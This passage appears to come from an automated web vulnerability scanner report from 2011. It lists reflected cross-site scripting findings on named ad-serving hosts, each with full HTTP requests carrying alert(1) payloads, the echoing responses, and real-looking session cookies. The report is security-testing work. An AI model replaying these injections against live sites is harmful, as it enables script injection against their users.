GET /adj/q1.boston/life;sz=728x90;click0=;ord=1100566473?&1d913'-alert(1)-'3feb78746bb =1 HTTP/1.1 Host: a.collective-media.net Proxy-Connection: keep-alive Referer: http://www.boston.com/lifestyle/articles/2011/07/23/facebook_twitter_obligations_persist_during_vacations/?p1=Upbox_links User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: cli=120221f8320d7dc; JY57=3Xb5lD-USjwD8RbugxhH_yfexKlm_w7BvRZXEZ3OiTN5kUf_u1eMoCg; dc=dc
Response
HTTP/1.1 200 OK Server: nginx/0.8.53 Content-Type: application/x-javascript P3P: policyref="http://a.collective-media.net/static/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE" Content-Length: 449 Date: Sat, 23 Jul 2011 13:48:16 GMT Connection: close Vary: Accept-Encoding Set-Cookie: dc=dc; domain=collective-media.net; path=/; expires=Mon, 22-Aug-2011 13:48:16 GMT var cmPageURL; if(self == top) cmPageURL = document.location.href; else cmPageURL = document.referrer; var cmifr = (self==top ? '' : 'env=ifr;'); document.write('<scr'+'ipt language="javascript" src="http://a.collective-media.net/cmadj/q1.boston/life;sz=728x90;net=q1;ord=1100566473?&1d913'-alert(1)-'3feb78746bb =1;'+cmifr+'ord1=' +Math.floor(Math.random() * 1000000) + ';cmpgurl='+escape(escape(cmPageURL))+'?">...[SNIP]...
3.12. http://a.collective-media.net/adj/q1.boston/life [sz parameter]
previous
next
Summary
Severity:
High
Confidence:
Certain
Host:
http://a.collective-media.net
Path:
/adj/q1.boston/life
Issue detail
The value of the sz request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 56604'-alert(1)-'a336edbc83a was submitted in the sz parameter. This input was echoed unmodified in the application's response. This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /adj/q1.boston/life;sz=728x90;click0=;ord=1100566473?56604'-alert(1)-'a336edbc83a HTTP/1.1 Host: a.collective-media.net Proxy-Connection: keep-alive Referer: http://www.boston.com/lifestyle/articles/2011/07/23/facebook_twitter_obligations_persist_during_vacations/?p1=Upbox_links User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: cli=120221f8320d7dc; JY57=3Xb5lD-USjwD8RbugxhH_yfexKlm_w7BvRZXEZ3OiTN5kUf_u1eMoCg; dc=dc
Response
HTTP/1.1 200 OK Server: nginx/0.8.53 Content-Type: application/x-javascript P3P: policyref="http://a.collective-media.net/static/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE" Content-Length: 446 Date: Sat, 23 Jul 2011 13:48:15 GMT Connection: close Vary: Accept-Encoding Set-Cookie: dc=dc; domain=collective-media.net; path=/; expires=Mon, 22-Aug-2011 13:48:15 GMT var cmPageURL; if(self == top) cmPageURL = document.location.href; else cmPageURL = document.referrer; var cmifr = (self==top ? '' : 'env=ifr;'); document.write('<scr'+'ipt language="javascript" src="http://a.collective-media.net/cmadj/q1.boston/life;sz=728x90;net=q1;ord=1100566473?56604'-alert(1)-'a336edbc83a ;'+cmifr+'ord1=' +Math.floor(Math.random() * 1000000) + ';cmpgurl='+escape(escape(cmPageURL))+'?">...[SNIP]...
3.13. http://a.collective-media.net/adj/q1.q.boston/be_life [REST URL parameter 2]
previous
next
Summary
Severity:
High
Confidence:
Certain
Host:
http://a.collective-media.net
Path:
/adj/q1.q.boston/be_life
Issue detail
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 716af'-alert(1)-'eaa09b6c518 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response. This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /adj/q1.q.boston716af'-alert(1)-'eaa09b6c518 /be_life;sz=728x90;ord=971628896? HTTP/1.1 Host: a.collective-media.net Proxy-Connection: keep-alive Referer: http://www.boston.com/lifestyle/articles/2011/07/23/facebook_twitter_obligations_persist_during_vacations/?p1=Upbox_links User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: cli=120221f8320d7dc; JY57=3Xb5lD-USjwD8RbugxhH_yfexKlm_w7BvRZXEZ3OiTN5kUf_u1eMoCg; dc=dc; apnx=1; nadp=1; blue=1; qcdp=1
Response
HTTP/1.1 200 OK Server: nginx/0.8.53 Content-Type: application/x-javascript P3P: policyref="http://a.collective-media.net/static/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE" Content-Length: 449 Date: Sat, 23 Jul 2011 13:48:32 GMT Connection: close Vary: Accept-Encoding Set-Cookie: dc=dc; domain=collective-media.net; path=/; expires=Mon, 22-Aug-2011 13:48:32 GMT var cmPageURL; if(self == top) cmPageURL = document.location.href; else cmPageURL = document.referrer; var cmifr = (self==top ? '' : 'env=ifr;'); document.write('<scr'+'ipt language="javascript" src="http://a.collective-media.net/cmadj/q1.q.boston716af'-alert(1)-'eaa09b6c518 /be_life;sz=728x90;net=q1;ord=971628896;'+cmifr+'ord1=' +Math.floor(Math.random() * 1000000) + ';cmpgurl='+escape(escape(cmPageURL))+'?">...[SNIP]...
3.14. http://a.collective-media.net/adj/q1.q.boston/be_life [REST URL parameter 3]
previous
next
Summary
Severity:
High
Confidence:
Certain
Host:
http://a.collective-media.net
Path:
/adj/q1.q.boston/be_life
Issue detail
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload be8ae'-alert(1)-'98331bd179c was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response. This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /adj/q1.q.boston/be_lifebe8ae'-alert(1)-'98331bd179c ;sz=728x90;ord=971628896? HTTP/1.1 Host: a.collective-media.net Proxy-Connection: keep-alive Referer: http://www.boston.com/lifestyle/articles/2011/07/23/facebook_twitter_obligations_persist_during_vacations/?p1=Upbox_links User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: cli=120221f8320d7dc; JY57=3Xb5lD-USjwD8RbugxhH_yfexKlm_w7BvRZXEZ3OiTN5kUf_u1eMoCg; dc=dc; apnx=1; nadp=1; blue=1; qcdp=1
Response
HTTP/1.1 200 OK Server: nginx/0.8.53 Content-Type: application/x-javascript P3P: policyref="http://a.collective-media.net/static/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE" Content-Length: 449 Date: Sat, 23 Jul 2011 13:48:32 GMT Connection: close Vary: Accept-Encoding Set-Cookie: dc=dc; domain=collective-media.net; path=/; expires=Mon, 22-Aug-2011 13:48:32 GMT var cmPageURL; if(self == top) cmPageURL = document.location.href; else cmPageURL = document.referrer; var cmifr = (self==top ? '' : 'env=ifr;'); document.write('<scr'+'ipt language="javascript" src="http://a.collective-media.net/cmadj/q1.q.boston/be_lifebe8ae'-alert(1)-'98331bd179c ;sz=728x90;net=q1;ord=971628896;'+cmifr+'ord1=' +Math.floor(Math.random() * 1000000) + ';cmpgurl='+escape(escape(cmPageURL))+'?">...[SNIP]...
3.15. http://a.collective-media.net/adj/q1.q.boston/be_life [name of an arbitrarily supplied request parameter]
previous
next
Summary
Severity:
High
Confidence:
Certain
Host:
http://a.collective-media.net
Path:
/adj/q1.q.boston/be_life
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 5e409'-alert(1)-'2bccaf234b5 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response. This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /adj/q1.q.boston/be_life;sz=728x90;ord=971628896?&5e409'-alert(1)-'2bccaf234b5 =1 HTTP/1.1 Host: a.collective-media.net Proxy-Connection: keep-alive Referer: http://www.boston.com/lifestyle/articles/2011/07/23/facebook_twitter_obligations_persist_during_vacations/?p1=Upbox_links User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: cli=120221f8320d7dc; JY57=3Xb5lD-USjwD8RbugxhH_yfexKlm_w7BvRZXEZ3OiTN5kUf_u1eMoCg; dc=dc; apnx=1; nadp=1; blue=1; qcdp=1
Response
HTTP/1.1 200 OK Server: nginx/0.8.53 Content-Type: application/x-javascript P3P: policyref="http://a.collective-media.net/static/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE" Content-Length: 453 Date: Sat, 23 Jul 2011 13:48:32 GMT Connection: close Vary: Accept-Encoding Set-Cookie: dc=dc; domain=collective-media.net; path=/; expires=Mon, 22-Aug-2011 13:48:32 GMT var cmPageURL; if(self == top) cmPageURL = document.location.href; else cmPageURL = document.referrer; var cmifr = (self==top ? '' : 'env=ifr;'); document.write('<scr'+'ipt language="javascript" src="http://a.collective-media.net/cmadj/q1.q.boston/be_life;sz=728x90;net=q1;ord=971628896?&5e409'-alert(1)-'2bccaf234b5 =1;'+cmifr+'ord1=' +Math.floor(Math.random() * 1000000) + ';cmpgurl='+escape(escape(cmPageURL))+'?">...[SNIP]...
3.16. http://a.collective-media.net/adj/q1.q.boston/be_life [sz parameter]
previous
next
Summary
Severity:
High
Confidence:
Certain
Host:
http://a.collective-media.net
Path:
/adj/q1.q.boston/be_life
Issue detail
The value of the sz request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 25988'-alert(1)-'2536406d3ba was submitted in the sz parameter. This input was echoed unmodified in the application's response. This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /adj/q1.q.boston/be_life;sz=728x90;ord=971628896?25988'-alert(1)-'2536406d3ba HTTP/1.1 Host: a.collective-media.net Proxy-Connection: keep-alive Referer: http://www.boston.com/lifestyle/articles/2011/07/23/facebook_twitter_obligations_persist_during_vacations/?p1=Upbox_links User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: cli=120221f8320d7dc; JY57=3Xb5lD-USjwD8RbugxhH_yfexKlm_w7BvRZXEZ3OiTN5kUf_u1eMoCg; dc=dc; apnx=1; nadp=1; blue=1; qcdp=1
Response
HTTP/1.1 200 OK Server: nginx/0.8.53 Content-Type: application/x-javascript P3P: policyref="http://a.collective-media.net/static/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE" Content-Length: 450 Date: Sat, 23 Jul 2011 13:48:31 GMT Connection: close Vary: Accept-Encoding Set-Cookie: dc=dc; domain=collective-media.net; path=/; expires=Mon, 22-Aug-2011 13:48:31 GMT var cmPageURL; if(self == top) cmPageURL = document.location.href; else cmPageURL = document.referrer; var cmifr = (self==top ? '' : 'env=ifr;'); document.write('<scr'+'ipt language="javascript" src="http://a.collective-media.net/cmadj/q1.q.boston/be_life;sz=728x90;net=q1;ord=971628896?25988'-alert(1)-'2536406d3ba ;'+cmifr+'ord1=' +Math.floor(Math.random() * 1000000) + ';cmpgurl='+escape(escape(cmPageURL))+'?">...[SNIP]...
3.17. http://a.collective-media.net/cmadj/cm.yearbook/ford_ron_071911 [REST URL parameter 2]
previous
next
Summary
Severity:
High
Confidence:
Certain
Host:
http://a.collective-media.net
Path:
/cmadj/cm.yearbook/ford_ron_071911
Issue detail
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload def1c'-alert(1)-'c357eca95f6 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response. This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /cmadj/cm.yearbookdef1c'-alert(1)-'c357eca95f6 /ford_ron_071911;sz=300x250;net=cm;ord=1520731557;ord1=218732;cmpgurl=http%253A//games.myyearbook.com/? HTTP/1.1 Host: a.collective-media.net User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13 Accept: */* Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 Keep-Alive: 115 Proxy-Connection: keep-alive Referer: http://games.myyearbook.com/ Cookie: cli=11fda490648f83c; JY57=3kllfTqBzxxTNc9vAlundMYc3uaxeM3o8ANWZfHmJX3kmfPanrzCyLw; dc=dc
Response
HTTP/1.1 200 OK Server: nginx/0.8.53 Content-Type: application/x-javascript P3P: policyref="http://a.collective-media.net/static/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE" Vary: Accept-Encoding Date: Thu, 21 Jul 2011 18:00:53 GMT Content-Length: 8539 Connection: close Set-Cookie: qcdp=1; domain=collective-media.net; path=/; expires=Fri, 22-Jul-2011 18:00:53 GMT Set-Cookie: exdp=1; domain=collective-media.net; path=/; expires=Thu, 28-Jul-2011 18:00:53 GMT Set-Cookie: vadp=1; domain=collective-media.net; path=/; expires=Thu, 28-Jul-2011 18:00:53 GMT Set-Cookie: ibvr=1; domain=collective-media.net; path=/; expires=Thu, 28-Jul-2011 18:00:53 GMT function cmIV_(){var a=this;this.ts=null;this.tsV=null;this.te=null;this.teV=null;this.fV=false;this.fFV=false;this.fATF=false;this.nLg=0;this._ob=null;this._obi=null;this._id=null;this._ps=null;this....[SNIP]... <scr'+'ipt language="Javascript">CollectiveMedia.createAndAttachAd("cm-10222814201_1311271253","http://ib.adnxs.com/ptj?member=311&inv_code=cm.yearbookdef1c'-alert(1)-'c357eca95f6 &size=300x250&imp_id=cm-10222814201_1311271253,11fda490648f83c&referrer=http%3A%2F%2Fgames.myyearbook.com%2F&redir=http%3A%2F%2Fad.doubleclick.net%2Fadj%2Fcm.yearbookdef1c%27-alert%281%29-%27c357eca95f...[SNIP]...
3.18. http://a.collective-media.net/cmadj/cm.yearbook/ford_ron_071911 [sz parameter]
previous
next
Summary
Severity:
High
Confidence:
Firm
Host:
http://a.collective-media.net
Path:
/cmadj/cm.yearbook/ford_ron_071911
Issue detail
The value of the sz request parameter is copied into a JavaScript expression which is not encapsulated in any quotation marks. The payload 5fa4e(a)a8c98bec559 was submitted in the sz parameter. This input was echoed unmodified in the application's response. This behaviour demonstrates that it is possible to inject JavaScript commands into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /cmadj/cm.yearbook/ford_ron_071911;sz=5fa4e(a)a8c98bec559 HTTP/1.1 Host: a.collective-media.net User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13 Accept: */* Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 Keep-Alive: 115 Proxy-Connection: keep-alive Referer: http://games.myyearbook.com/ Cookie: cli=11fda490648f83c; JY57=3kllfTqBzxxTNc9vAlundMYc3uaxeM3o8ANWZfHmJX3kmfPanrzCyLw; dc=dc
Response
HTTP/1.1 200 OK Server: nginx/0.8.53 Content-Type: application/x-javascript P3P: policyref="http://a.collective-media.net/static/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE" Vary: Accept-Encoding Date: Thu, 21 Jul 2011 18:00:52 GMT Content-Length: 8446 Connection: close Set-Cookie: qcdp=1; domain=collective-media.net; path=/; expires=Fri, 22-Jul-2011 18:00:52 GMT Set-Cookie: exdp=1; domain=collective-media.net; path=/; expires=Thu, 28-Jul-2011 18:00:52 GMT Set-Cookie: vadp=1; domain=collective-media.net; path=/; expires=Thu, 28-Jul-2011 18:00:52 GMT Set-Cookie: ibvr=1; domain=collective-media.net; path=/; expires=Thu, 28-Jul-2011 18:00:52 GMT function cmIV_(){var a=this;this.ts=null;this.tsV=null;this.te=null;this.teV=null;this.fV=false;this.fFV=false;this.fATF=false;this.nLg=0;this._ob=null;this._obi=null;this._id=null;this._ps=null;this....[SNIP]... s/collective",false);CollectiveMedia.addPixel("http://ev.ib-ibi.com/image.sbix?go=2223&pid=15",false);var bap_rnd = Math.floor(Math.random()*100000); var _bao = { coid:44, nid:546, ad_h:, ad_w:5fa4e(a)a8c98bec559 , uqid:bap_rnd, cps:'cm,bz' }; document.write('<img style="margin:0;padding:0;" border="0" width="0" height="0" src="http://c.betrad.com/a/4.gif" id="bap-pixel-'+bap_rnd+'"/>...[SNIP]...
3.19. http://a.fsdn.com/adops/google/rev2/afc/css/ [id parameter]
previous
next
Summary
Severity:
High
Confidence:
Certain
Host:
http://a.fsdn.com
Path:
/adops/google/rev2/afc/css/
Issue detail
The value of the id request parameter is copied into the HTML document as plain text between tags. The payload 571d6<script>alert(1)</script>cb7344dcae0 was submitted in the id parameter. This input was echoed unmodified in the application's response. This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /adops/google/rev2/afc/css/?fn=afc_sf_imu_grey_x1.css&id=fad72571d6<script>alert(1)</script>cb7344dcae0 &class=ad HTTP/1.1 Host: a.fsdn.com User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13 Accept: text/css,*/*;q=0.1 Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 Keep-Alive: 115 Proxy-Connection: keep-alive Referer: http://sourceforge.net/projects/hoytllc-vcloud/
Response
HTTP/1.1 200 OK Server: Apache/2.2.3 (CentOS) Content-Type: text/css; charset=ISO-8859-1 Vary: Accept-Encoding Cache-Control: public, max-age=1209600 Expires: Sat, 06 Aug 2011 04:42:34 GMT Date: Sat, 23 Jul 2011 04:42:34 GMT Content-Length: 1274 Connection: close #fad72571d6<script>alert(1)</script>cb7344dcae0 { width:300px; height:250px; } #fad72571d6<script>alert(1)</script>cb7344dcae0 div.google_afc { width:300px; height:250px; text-align:center; ...[SNIP]...
3.20. http://a.netmng.com/hic/ [click parameter]
previous
next
Summary
Severity:
High
Confidence:
Certain
Host:
http://a.netmng.com
Path:
/hic/
Issue detail
The value of the click request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7b532"><script>alert(1)</script>1c809b7e17d was submitted in the click parameter. This input was echoed unmodified in the application's response. This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /hic/?nm_width=300&nm_height=250&nm_publ=178&nm_c=200&beacon=march2011&url=trafficmp&passback=&click=http%3A%2F%2Flm.trafficmp.com%2Fclicksense%2Fclick%3Ft%3D3552737354895902192%26l%3D908365%26ad%3D96040%26s%3D917258%26c%3Dhttp%3A%2F%2Fmedia.trafficmp.com%2Fa%2Fclick%3F_-611797114104433*_3107*levM_99*sPC_115*Byp_3443735*lpF_3247**kx3bm41vejeq___3533310**0_3805*MEn_114**_-8628394437b532"><script>alert(1)</script>1c809b7e17d HTTP/1.1 Host: a.netmng.com User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 Keep-Alive: 115 Proxy-Connection: keep-alive Referer: http://games.myyearbook.com/ Cookie: evo5=hryjysfdf0upy%7ChmKrC4uqXwyKEq2D0zN7z3w4I9UsaebVw0C8tcmHu3W2hNa0FXsr7rQreKFYfn8aDum9MIBCzH5i6UHr3K8%2B%2FGO0iNX8jxKwnOnl%2Fdwz6Q3nevqW761%2FSPWVjeuthbVgxAfVMpl9pGOuxNbLa%2FAUUAwFQ%2BNAGUP78O2Ea6XX2UwRwaN3KyxZ4YAuk5XSS71KqSAnZx3HX6TOKSmtb8Isi8VHdeTLFj4BdvghV79DeDb0O283Bj8I27%2FJMqWhFOxbhal4JR%2FrVjEuetCnzzZ%2B9TxdqPgTjGPsXEz72rPqCDmab5%2BCFHagvG2BRygZuritvfpnObnfPDTtSqhTTzFBqkA5zV%2Bjcros7mCvT3FoNTqX6osMQGdpmzoY77qZWBbZ; evo5_ii=vcRY%2BVCpUfN0%2BPB1tFnV5yG7u0dcFwU2HUsmkxANIEaW0e99haFIbVN4RXHwO17b99k3tT4krtzpwqtfFqzt7w%3D%3D; evo5_display=dLlGabeGUgWLGMs8D976%2FClUB%2B%2Bwcf164wnglFlBvlw%3D
Response
HTTP/1.1 200 OK Date: Thu, 21 Jul 2011 18:01:43 GMT Server: Apache/2.2.9 P3P: policyref="http://a.netmng.com/w3c/p3p.xml", CP="NOI DSP COR DEVa PSAa OUR BUS COM NAV" Expires: Tue, 19 Jul 2011 18:01:43 GMT Last-Modified: Tue, 19 Jul 2011 18:01:43 GMT Cache-Control: no-store, no-cache, must-revalidate Cache-Control: post-check=0, pre-check=0 Pragma: no-cache Set-Cookie: evo5_ii=JLLF4eT1WhcY7TzYRhauNik%2BFECnwub8U63nHW2DWuRflztgED0I2C1qSGxfKQ30JhG6I9%2B82AcGCSG4fp0PY4TBZ4S3MlrjOmmteXUAUoOdN7dG7kiWhSQrDQPTbLOV; expires=Fri, 20-Jan-2012 18:01:43 GMT; path=/ Set-Cookie: evo5_display=hKn31hJ9q24SwrCsKVHtvYupVI9QLFINGjr%2BmRr8YLXwAyLdvUmC2N2XsEzoQNrOmFE38RQRoG368kINn%2FWgDA%3D%3D; expires=Sat, 25-Jun-44591 18:01:43 GMT; path=/; domain=.netmng.com Content-Length: 1781 Connection: close Content-Type: text/html; charset=UTF-8 <IFRAME SRC="http://ad.doubleclick.net/adi/N1558.NetMining/B4616765.2;sz=300x250;ord=1311271303;click=http://lm.trafficmp.com/clicksense/click?t=3552737354895902192&l=908365&ad=96040&s=917258&c=http://media.trafficmp.com/a/click?_-611797114104433*_3107*levM_99*sPC_115*Byp_3443735*lpF_3247**kx3bm41vejeq___3533310**0_3805*MEn_114**_-8628394437b532"><script>alert(1)</script>1c809b7e17d ;?" WIDTH=300 HEIGHT=250 MARGINWIDTH=0 MARGINHEIGHT=0 HSPACE=0 VSPACE=0 FRAMEBORDER=0 SCROLLING=no BORDERCOLOR="#000000">...[SNIP]...
3.21. http://a.netmng.com/hic/ [click parameter]
previous
next
Summary
Severity:
High
Confidence:
Certain
Host:
http://a.netmng.com
Path:
/hic/
Issue detail
The value of the click request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8fb57"><script>alert(1)</script>d7a9c0aaf4c was submitted in the click parameter. This input was echoed unmodified in the application's response. This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /hic/?nm_width=300&nm_height=250&nm_publ=178&nm_c=200&beacon=march2011&url=trafficmp&passback=&click=http%3A%2F%2Flm.trafficmp.com%2Fclicksense%2Fclick%3Ft%3D3552737354895902192%26l%3D908365%26ad%3D96040%26s%3D917258%26c%3Dhttp%3A%2F%2Fmedia.trafficmp.com%2Fa%2Fclick%3F_-611797114104433*_3107*levM_99*sPC_115*Byp_3443735*lpF_3247**kx3bm41vejeq___3533310**0_3805*MEn_114**_-8628394438fb57"><script>alert(1)</script>d7a9c0aaf4c HTTP/1.1 Host: a.netmng.com User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 Keep-Alive: 115 Proxy-Connection: keep-alive Referer: http://games.myyearbook.com/ Cookie: evo5=hryjysfdf0upy%7ChmKrC4uqXwyKEq2D0zN7z3w4I9UsaebVw0C8tcmHu3W2hNa0FXsr7rQreKFYfn8aDum9MIBCzH5i6UHr3K8%2B%2FGO0iNX8jxKwnOnl%2Fdwz6Q3nevqW761%2FSPWVjeuthbVgxAfVMpl9pGOuxNbLa%2FAUUAwFQ%2BNAGUP78O2Ea6XX2UwRwaN3KyxZ4YAuk5XSS71KqSAnZx3HX6TOKSmtb8Isi8VHdeTLFj4BdvghV79DeDb0O283Bj8I27%2FJMqWhFOxbhal4JR%2FrVjEuetCnzzZ%2B9TxdqPgTjGPsXEz72rPqCDmab5%2BCFHagvG2BRygZuritvfpnObnfPDTtSqhTTzFBqkA5zV%2Bjcros7mCvT3FoNTqX6osMQGdpmzoY77qZWBbZ; evo5_ii=vcRY%2BVCpUfN0%2BPB1tFnV5yG7u0dcFwU2HUsmkxANIEaW0e99haFIbVN4RXHwO17b99k3tT4krtzpwqtfFqzt7w%3D%3D; evo5_display=dLlGabeGUgWLGMs8D976%2FClUB%2B%2Bwcf164wnglFlBvlw%3D
Response
HTTP/1.1 200 OK Date: Thu, 21 Jul 2011 18:01:43 GMT Server: Apache/2.2.9 P3P: policyref="http://a.netmng.com/w3c/p3p.xml", CP="NOI DSP COR DEVa PSAa OUR BUS COM NAV" Expires: Tue, 19 Jul 2011 18:01:43 GMT Last-Modified: Tue, 19 Jul 2011 18:01:43 GMT Cache-Control: no-store, no-cache, must-revalidate Cache-Control: post-check=0, pre-check=0 Pragma: no-cache Set-Cookie: evo5_ii=JLLF4eT1WhcY7TzYRhauNik%2BFECnwub8U63nHW2DWuRvPrOi2h1nnLXEbLzAx%2FMbymvWgkgSDWaJ1NnSqwvsCipe9M%2B%2F6dyjEczknUspeVthiWdr3v5YG6tiKaLtu61l; expires=Fri, 20-Jan-2012 18:01:43 GMT; path=/ Set-Cookie: evo5_display=hKn31hJ9q24SwrCsKVHtvYupVI9QLFINGjr%2BmRr8YLXwAyLdvUmC2N2XsEzoQNrOmFE38RQRoG368kINn%2FWgDA%3D%3D; expires=Sat, 25-Jun-44591 18:01:43 GMT; path=/; domain=.netmng.com Content-Length: 1781 Connection: close Content-Type: text/html; charset=UTF-8 <IFRAME SRC="http://ad.doubleclick.net/adi/N1558.NetMining/B4616765.2;sz=300x250;ord=1311271303;click=http://lm.trafficmp.com/clicksense/click?t=3552737354895902192&l=908365&ad=96040&s=917258&c=http:/...[SNIP]... k?t=3552737354895902192&l=908365&ad=96040&s=917258&c=http://media.trafficmp.com/a/click?_-611797114104433*_3107*levM_99*sPC_115*Byp_3443735*lpF_3247**kx3bm41vejeq___3533310**0_3805*MEn_114**_-8628394438fb57"><script>alert(1)</script>d7a9c0aaf4c ;?">...[SNIP]...
3.22. http://ad.doubleclick.net/adi/interactive.wsj.com/markets_newsreel [name of an arbitrarily supplied request parameter]
previous
next
Summary
Severity:
High
Confidence:
Certain
Host:
http://ad.doubleclick.net
Path:
/adi/interactive.wsj.com/markets_newsreel
Issue detail
